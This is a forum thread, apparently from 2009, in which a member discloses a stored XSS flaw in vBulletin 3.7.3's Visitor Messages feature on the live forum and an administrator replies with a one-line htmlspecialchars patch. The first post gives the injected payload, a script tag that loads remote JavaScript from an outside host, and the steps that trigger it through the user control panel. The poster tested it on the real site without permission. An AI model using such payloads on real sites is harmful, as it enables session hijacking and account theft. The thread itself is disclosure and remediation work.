NOTICE THIS XSS/XSRF VULNERABILITY WAS FOUND BY ME. @ admin (shabbir) Please don't ban me for this. Because I have not used this hack for any illegal / harmful purposes. (You can check all records). I have just tested an exploited and found it positive. Please fix it soon. I write this article so as to bring this thing to your eyes first, before anyone else knows about it and takes advantage. Please do NOT reject this article and please approve it. Please don't remove this NOTICE section. Action First, we must check the version of vBulletin used by G4EF : (1) Open any page such as your user control panel. (2) View the page-source. (3) You discover this : Code: <style type="text/css" id="vbulletin_css"> /** * vBulletin 3.7.3 CSS * Style: 'Default Style'; Style ID: 1 */ @import url("clientscript/vbulletin_css/style-eb31dabe-00001.css"); </style> (4) Perfect ! G4EF is not upgraded to latest 3.8.x vBulletin. So, we can hack it. The vulnerability : When vBulletin is used with "Visitor Messages" add-on, we can easily execute external code by XSS vulnerability that exists. When the XSS script is posted as visitor message, the data is run through htmlentities(); before being displayed to the general public/forum members. However, when posting a new message, a new notification is sent to the commentee (the one who receives). And when the commentee visits usercp.php (User Control Panel), under the domain he is hit with an unfiltered xss attach ! How I tested it : (1) I opened a duplicate account : _H4X0R_, which I request shabbir to kindly delete now. (2) I posted some test visitor messages. The most interesting (and working) one was <SCRIPT SRC=http://ha.ckers.org/xss.js> (3) I logged out. (4) I logged in as _H4X0R_. (5) Opened my user control panel : usercp.php. (6) Whoa !! XSS successful ! Conclusion Please don't use this knowledge for illegal/harmful purposes. This was written only for educational purposes. I think I deserve some good reputation points and/or some rewards for this ! Sorry shabbir, for using duplicate account but you may delete it now. You should also understand that this was important for the security of the forum and so please don't ban me :p
Thanks for reporting Saswat and Upgrading to 3.7.6 is the preferred solution which we would also be doing it but here is the quick fix. Using vBulletin 3.7.3 and having all the functionality and plugins tested I preferred not to upgrade immediately ( Though I have the upgrade option ) and here is the patch for this Vulnerability. Open usercp.php file Go to Line Number 250 Find the following Code Code: $visitormessage['summary'] = fetch_word_wrapped_string(fetch_censored_text(fetch_trimmed_title(strip_bbcode($visitormessage['pagetext'], true, true), 50))); Replace with Code: $visitormessage['summary'] = htmlspecialchars_uni(fetch_word_wrapped_string(fetch_censored_text(fetch_trimmed_title(strip_bbcode($visitormessage['pagetext'], true, true), 50)))); And that should be fine for this problem. vBulletin also recommendeds to upgrade to latest version which has all the fixes.
ncie find. I really like XSS vulnerabilities. not 100% sure but i think its already reported to miliw0rm couple of months back.
checkout miliw0rm.com , all the vulnerabilities which are found by different hackers and penetration testers are released under that program. Just search for "vbulletin" and you will see lots of them. This site plays a major role to help the developers of different CMSes to release a new version of their software after fixing the vulnerabilities.
Yeah, I got it. But it's not miliw0rm.com, it's milw0rm.com. Lots of vulnerabilities and a md5 cracker too : perfect package for hackers.
Yes it was found on many other websites as well but no one had the Patch unless you upgrade the complete code and so here I provided the patch as well. Enjoy
Nomination for article of the month - Jun 2009 Started. Nominate this article for Article of the month - Jun 2009
